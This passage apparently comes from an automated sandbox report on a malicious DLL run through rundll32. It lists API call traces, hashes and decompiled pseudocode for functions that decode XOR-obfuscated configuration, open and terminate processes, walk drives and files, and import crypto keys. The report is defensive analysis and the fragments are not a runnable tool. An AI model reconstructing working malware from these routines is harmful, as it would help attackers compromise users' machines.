                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                                • String ID:
                                • API String ID: 730886825-0
                                • Opcode ID: 9bf946976bc78182fd2bd0d80aab1c653b0271367fd26ae2d5f3c4f32e0a39ad
                                • Instruction ID: 3f9528745a002eaa805bcb066e5b749a8d19671befd69df5799c76dbd6c5f6f5
                                • Opcode Fuzzy Hash: 9bf946976bc78182fd2bd0d80aab1c653b0271367fd26ae2d5f3c4f32e0a39ad
                                • Instruction Fuzzy Hash: 7B018C35510204BFEB21EB95CC49F9E7BECAB06610F04004BB501BE284DA70AA00D7A8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03484837 Relevance: 1.3, APIs: 1, Instructions: 45COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • memset.NTDLL ref: 03484855
                                  • Part of subcall function 0348A451: memset.NTDLL ref: 0348A477
                                  • Part of subcall function 0348A451: memcpy.NTDLL ref: 0348A49F
                                  • Part of subcall function 0348A451: GetLastError.KERNEL32(00000010,00000218,0349386D,00000100,?,00000318,00000008), ref: 0348A4B6
                                  • Part of subcall function 0348A451: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,0349386D,00000100), ref: 0348A599
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastmemset$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 4290293647-0
                                • Opcode ID: 5b2f263d7f4184a41f74a888a5d74c8e815e318468028f31ca900844e99c3833
                                • Instruction ID: 2c39c871469af7ad0b175c4b03088a5f72c987a67a9cadd04c6e700e911cb5b6
                                • Opcode Fuzzy Hash: 5b2f263d7f4184a41f74a888a5d74c8e815e318468028f31ca900844e99c3833
                                • Instruction Fuzzy Hash: AE01FD345013596BC721FF2BD804B8F7BE8AB44724F04882BFC489E340D371D9048AA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0343155C Relevance: 1.3, APIs: 1, Instructions: 43memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E0343155C(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E034312CA(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x343a2d8, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E03431B6F(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}








                                0x0343155c
                                0x03431564
                                0x0343157b
                                0x03431596
                                0x0343159a
                                0x0343159f
                                0x034315a1
                                0x034315b3
                                0x034315bf
                                0x034315a3
                                0x034315a3
                                0x034315a8
                                0x034315ad
                                0x034315ad
                                0x034315a1
                                0x034315c5
                                0x034315c9
                                0x034315c9
                                0x03431570
                                0x03431575
                                0x03431579
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                  • Part of subcall function 03431B6F: SysFreeString.OLEAUT32(00000000), ref: 03431BD2
                                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,76CDF710,?,00000000,?,00000000,?,034321A9,?,004F0053,055E9400,00000000,?), ref: 034315BF
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Free$HeapString
                                • String ID:
                                • API String ID: 3806048269-0
                                • Opcode ID: 17d1399b633a62990b78afa1c25d15d078900b391e45e93c0f072d3d7f1f2c3b
                                • Instruction ID: 7dcd57b5eee47585b4e64878ea9ba59db4bc412f28d9191ba99984d190459cbe
                                • Opcode Fuzzy Hash: 17d1399b633a62990b78afa1c25d15d078900b391e45e93c0f072d3d7f1f2c3b
                                • Instruction Fuzzy Hash: BC014B36500659BBCB22EF94CC01EEA7BA5EF09750F08842AFE169F364D731D960DB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034324B3 Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 75%
                                			E034324B3(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E03435FBB( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E03436D63(_a8 + _a8);
					if(_t21 != 0) {
						E0343298F(_a4, _t21, _t23);
					}
					E03436C2C(_a4);
				}
				return _t21;
			}





                                0x034324bb
                                0x034324c2
                                0x034324c4
                                0x034324d3
                                0x034324da
                                0x034324e9
                                0x034324ed
                                0x034324f4
                                0x034324f4
                                0x034324fc
                                0x03432501
                                0x03432506

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,034358D7,00000000,?,03431D97,00000000,034358D7,?,75BCC740,034358D7,00000000,055E95B0), ref: 034324C4
                                  • Part of subcall function 03435FBB: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,034324D8,00000001,034358D7,00000000), ref: 03435FF3
                                  • Part of subcall function 03435FBB: memcpy.NTDLL(034324D8,034358D7,00000010,?,?,?,034324D8,00000001,034358D7,00000000,?,03431D97,00000000,034358D7,?,75BCC740), ref: 0343600C
                                  • Part of subcall function 03435FBB: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 03436035
                                  • Part of subcall function 03435FBB: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 0343604D
                                  • Part of subcall function 03435FBB: memcpy.NTDLL(00000000,75BCC740,055E95B0,00000010), ref: 0343609F
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                                • String ID:
                                • API String ID: 894908221-0
                                • Opcode ID: dad2d23339612fd8aab51a1689c13ac7c69579f651cd572410ed3f079e5edd61
                                • Instruction ID: c01ba36572a2cfd5d61940e6d218cbd7c54abdafb449deb442c0c8395da02048
                                • Opcode Fuzzy Hash: dad2d23339612fd8aab51a1689c13ac7c69579f651cd572410ed3f079e5edd61
                                • Instruction Fuzzy Hash: 0DF03A3A100209BBCF11AE56DC40DEB7BADEF8A260B058027FD08DF114DA72DA559BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034374B6 Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E034374B6(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E034323D9(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E034314F1(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}




                                0x034374be
                                0x034374d8
                                0x00000000
                                0x034374f4
                                0x034374cf
                                0x034374d6
                                0x00000000
                                0x00000000
                                0x034374fb

                                APIs
                                • lstrlenW.KERNEL32(?,?,?,0343363B,3D034390,80000002,03437168,03437283,74666F53,4D4C4B48,03437283,?,3D034390,80000002,03437168,?), ref: 034374DB
                                  • Part of subcall function 034314F1: SysAllocString.OLEAUT32(03437283), ref: 0343150A
                                  • Part of subcall function 034314F1: SysFreeString.OLEAUT32(00000000), ref: 0343154B
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFreelstrlen
                                • String ID:
                                • API String ID: 3808004451-0
                                • Opcode ID: 96de9c2b671dbe38217f84a0e909a28b3a20e52dc08b95808e99fc5c40d9d008
                                • Instruction ID: 67d517bd264722f6c2ef3de91370b1eb17b8145ce7a032e51dffb1aa6d74490d
                                • Opcode Fuzzy Hash: 96de9c2b671dbe38217f84a0e909a28b3a20e52dc08b95808e99fc5c40d9d008
                                • Instruction Fuzzy Hash: ADF0923600020EBFDF02AF91EC05EEA3F6AAB29350F048015BA44991B1D772D5B1EBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03432B23 Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E03432B23(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E03432575(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E03436C2C(_a4);
				}
				return _t12;
			}





                                0x03432b2f
                                0x03432b34
                                0x03432b38
                                0x03432b3f
                                0x03432b4a
                                0x03432b4e
                                0x03432b4e
                                0x03432b57

                                APIs
                                  • Part of subcall function 03432575: memcpy.NTDLL(00000000,00000110,?,?,?,?,?,?,?,03434493,?), ref: 034325AB
                                  • Part of subcall function 03432575: memset.NTDLL ref: 03432621
                                  • Part of subcall function 03432575: memset.NTDLL ref: 03432635
                                • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,03434493,?,?,?,?), ref: 03432B3F
                                  • Part of subcall function 03436C2C: RtlFreeHeap.NTDLL(00000000,00000000,03435E1D,00000000,?,?,00000000), ref: 03436C38
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: memcpymemset$FreeHeap
                                • String ID:
                                • API String ID: 3053036209-0
                                • Opcode ID: 9861f71267f26eea5288bfea07ab5eea21efb883178210c204045fd7d85c8362
                                • Instruction ID: a0b8f44922c0558c33a868355fd7cc35bae73c11d3b7e19a2d2f6cd9117d946c
                                • Opcode Fuzzy Hash: 9861f71267f26eea5288bfea07ab5eea21efb883178210c204045fd7d85c8362
                                • Instruction Fuzzy Hash: 0BE0867A4002197ACB126E95DC40DEB7F5CDF4B591F044016FE084F204D632C61097F9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034773EB Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                Download Yara Rule
                                APIs
                                • memset.NTDLL ref: 034773F5
                                  • Part of subcall function 03476261: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020119,?,?,?,00000000), ref: 034762A8
                                  • Part of subcall function 03476261: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00000000), ref: 034762BE
                                  • Part of subcall function 03476261: RegCloseKey.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 03476307
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Open$Closememset
                                • String ID:
                                • API String ID: 1685373161-0
                                • Opcode ID: eae4752445d7aaf48354e339488d86f7a0e057409763ad57a1612276153bc34b
                                • Instruction ID: e6afd5bafc2e8b07c5aee4267355eb781168907ca7cb29016515ec79b41fc049
                                • Opcode Fuzzy Hash: eae4752445d7aaf48354e339488d86f7a0e057409763ad57a1612276153bc34b
                                • Instruction Fuzzy Hash: 34E0EC38240208BBDB50FE56DC51FD97B599B04754F10801ABE086E741DA75A660C799
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03491E9D Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                Download Yara Rule
                                APIs
                                • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,034960E0,0000002C,034890D3,06168E36,?,00000000,0348A484,?,00000318), ref: 03491EB7
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-0
                                • Opcode ID: a8d90a1caa6b739d66fd54875a1ecf231c809fa9e48db57fccbf2081ee45807f
                                • Instruction ID: e6526414161cf11e270919995c87d7430f14e7389c04f5c542d49a0c38f9c987
                                • Opcode Fuzzy Hash: a8d90a1caa6b739d66fd54875a1ecf231c809fa9e48db57fccbf2081ee45807f
                                • Instruction Fuzzy Hash: 31D0E234E016199BDF21DB95D84A99EFB70BF09720F608226E8607B190C23019158B94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 0348BAD1 Relevance: 28.7, APIs: 19, Instructions: 234stringfilesynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                  • Part of subcall function 034821B6: ExpandEnvironmentStringsW.KERNEL32(0347AEB5,00000000,00000000,00000001,00000000,00000000,0347E448,0347AEB5,00000000,0347E448,?), ref: 034821CD
                                  • Part of subcall function 034821B6: ExpandEnvironmentStringsW.KERNEL32(0347AEB5,00000000,00000000,00000000), ref: 034821E7
                                • lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0348BB1D
                                • lstrlenW.KERNEL32(?,?,00000000), ref: 0348BB29
                                • memset.NTDLL ref: 0348BB71
                                • FindFirstFileW.KERNEL32(00000000,00000000), ref: 0348BB8C
                                • lstrlenW.KERNEL32(0000002C), ref: 0348BBC4
                                • lstrlenW.KERNEL32(?), ref: 0348BBCC
                                • memset.NTDLL ref: 0348BBEF
                                • wcscpy.NTDLL ref: 0348BC01
                                • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0348BC27
                                • RtlEnterCriticalSection.NTDLL(?), ref: 0348BC5D
                                  • Part of subcall function 0348E803: RtlFreeHeap.NTDLL(00000000,?,03483953,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 0348E80F
                                • RtlLeaveCriticalSection.NTDLL(?), ref: 0348BC79
                                • FindNextFileW.KERNEL32(?,00000000), ref: 0348BC92
                                • WaitForSingleObject.KERNEL32(00000000), ref: 0348BCA4
                                • FindClose.KERNEL32(?), ref: 0348BCB9
                                • FindFirstFileW.KERNEL32(00000000,00000000), ref: 0348BCCD
                                • lstrlenW.KERNEL32(0000002C), ref: 0348BCEF
                                • FindNextFileW.KERNEL32(?,00000000), ref: 0348BD65
                                • WaitForSingleObject.KERNEL32(00000000), ref: 0348BD77
                                • FindClose.KERNEL32(?), ref: 0348BD92
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
                                • String ID:
                                • API String ID: 2962561936-0
                                • Opcode ID: 4c8c61ed7d7e8a7b913dda13fd792f1d2d215110ce3c6c1259346380786d95c9
                                • Instruction ID: c7837bb68631d6788906860a4940635814f7fa90f63710d721e170b7b8e0f945
                                • Opcode Fuzzy Hash: 4c8c61ed7d7e8a7b913dda13fd792f1d2d215110ce3c6c1259346380786d95c9
                                • Instruction Fuzzy Hash: 2A815971504305AFD721FF69DC84A1FBBE8EF88304F18482EF8859A252DB74D8058FA6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347B238 Relevance: 18.5, APIs: 12, Instructions: 519memoryCOMMON
                                Download Yara Rule
                                APIs
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0347B270
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0347B2A2
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0347B2D4
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0347B306
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0347B338
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0347B36A
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0347B39C
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0347B3CE
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0347B400
                                • HeapFree.KERNEL32(00000000,?,?,?,?,76CDF710,00000000,00000000), ref: 0347B593
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,?,?,?,76CDF710,00000000,00000000), ref: 0347B637
                                  • Part of subcall function 03487736: RtlAllocateHeap.NTDLL ref: 03487777
                                  • Part of subcall function 03487736: memset.NTDLL ref: 0348778B
                                  • Part of subcall function 03487736: GetCurrentThreadId.KERNEL32 ref: 03487818
                                  • Part of subcall function 03487736: GetCurrentThread.KERNEL32 ref: 0348782B
                                  • Part of subcall function 03476537: RtlEnterCriticalSection.NTDLL(0616C2D0), ref: 03476540
                                  • Part of subcall function 03476537: HeapFree.KERNEL32(00000000,?), ref: 03476572
                                  • Part of subcall function 03476537: RtlLeaveCriticalSection.NTDLL(0616C2D0), ref: 03476590
                                • HeapFree.KERNEL32(00000000,?,?,?,?,76CDF710,00000000,00000000), ref: 0347B5DF
                                  • Part of subcall function 0347D4DA: lstrlen.KERNEL32(?,00000000,76C86980,00000000,0347DA7B,?), ref: 0347D4E3
                                  • Part of subcall function 0347D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 0347D506
                                  • Part of subcall function 0347D4DA: memset.NTDLL ref: 0347D515
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Free$CriticalCurrentSectionThreadmemset$AllocateEnterLeavelstrlenmemcpy
                                • String ID:
                                • API String ID: 3296958911-0
                                • Opcode ID: 27c3ceabb75de2b3de7cea345ba858a5cd7ce58a06c4509a4b763c50f492a5ef
                                • Instruction ID: b69b26efbfb1cb64d817dff0ac271386c418b843ad4b59f7fb7ec5df57d06a38
                                • Opcode Fuzzy Hash: 27c3ceabb75de2b3de7cea345ba858a5cd7ce58a06c4509a4b763c50f492a5ef
                                • Instruction Fuzzy Hash: 14F183B5A10215AFCB60FFB9D885DEF73D8DB18680719492BA901EF304DB30E942875D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034710C7 Relevance: 16.6, APIs: 11, Instructions: 130libraryloadernativeCOMMON
                                Download Yara Rule
                                APIs
                                • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 034710FA
                                • GetLastError.KERNEL32 ref: 03471108
                                • NtSetInformationProcess.NTDLL ref: 03471162
                                • GetProcAddress.KERNEL32(?,00000000), ref: 034711A1
                                • GetProcAddress.KERNEL32(?), ref: 034711C2
                                • TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 03471219
                                • CloseHandle.KERNEL32(?), ref: 0347122F
                                • CloseHandle.KERNEL32(?), ref: 03471255
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                                • String ID:
                                • API String ID: 3529370251-0
                                • Opcode ID: e21ed06c8146e7e8eed60b205ab9cf52d529062ccb96dd97f70178966652702a
                                • Instruction ID: d9a80bedc84763f4f2b72baddb40da801312bade5bd1111b254ba095f58960e7
                                • Opcode Fuzzy Hash: e21ed06c8146e7e8eed60b205ab9cf52d529062ccb96dd97f70178966652702a
                                • Instruction Fuzzy Hash: 1E41AF70104345AFD711EF65D889A9BBBF8FB89304F140A6FF955EE210D3708A49CB96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347FD47 Relevance: 16.6, APIs: 11, Instructions: 94memorystringsynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • wcscpy.NTDLL ref: 0347FD7B
                                • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 0347FD87
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 0347FD98
                                • memset.NTDLL ref: 0347FDB5
                                • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 0347FDC3
                                • WaitForSingleObject.KERNEL32(00000000), ref: 0347FDD1
                                • GetDriveTypeW.KERNEL32(?), ref: 0347FDDF
                                • lstrlenW.KERNEL32(?), ref: 0347FDEB
                                • wcscpy.NTDLL ref: 0347FDFD
                                • lstrlenW.KERNEL32(?), ref: 0347FE17
                                • HeapFree.KERNEL32(00000000,?), ref: 0347FE30
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                                • String ID:
                                • API String ID: 3888849384-0
                                • Opcode ID: bd5f7c2446f6f15eb27d2b65f11a73116b323d77d0ab846e775f16b31d8c6297
                                • Instruction ID: 4a7cb286b5248d407b7368de71d6cd6dff9555cf4935fde04db6ff8f1ab073f7
                                • Opcode Fuzzy Hash: bd5f7c2446f6f15eb27d2b65f11a73116b323d77d0ab846e775f16b31d8c6297
                                • Instruction Fuzzy Hash: 1B314772C00108FFDB01AFA5DC89CEEBBBDEB19314B2144A7E501FA111E735AE499B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03431645 Relevance: 12.3, APIs: 8, Instructions: 258memoryCOMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 93%
                                			E03431645(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t115;
				void* _t118;
				intOrPtr _t121;

				_t118 = __esi;
				_t115 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x343a344; // 0x69b25f44
				if(E03437780( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x343a378 = _v8;
				}
				_t33 =  *0x343a344; // 0x69b25f44
				if(E03437780( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x343a344; // 0x69b25f44
				_push(_t115);
				if(E03437780( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x343a2d8, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x343a344; // 0x69b25f44
						_t45 = E03435450(_t104, _t102, _t98 ^ 0x7895433b);
					}
					_push(_t118);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x343a2e0 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x343a344; // 0x69b25f44
						_t46 = E03435450(_t104, _t102, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x343a2e4 = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x343a344; // 0x69b25f44
						_t47 = E03435450(_t104, _t102, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x343a2e8 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x343a344; // 0x69b25f44
						_t48 = E03435450(_t104, _t102, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x343a004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x343a344; // 0x69b25f44
						_t49 = E03435450(_t104, _t102, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x343a02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x343a344; // 0x69b25f44
						_t50 = E03435450(_t104, _t102, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x343a2ec = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x343a344; // 0x69b25f44
								_t51 = E03435450(_t104, _t102, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E03432FBC(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E034372C7();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x343a344; // 0x69b25f44
								_t52 = E03435450(_t104, _t102, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E03432FBC(0, _t52) != 0) {
								_t121 =  *0x343a3cc; // 0x55e95b0
								E0343765B(_t121 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x343a344; // 0x69b25f44
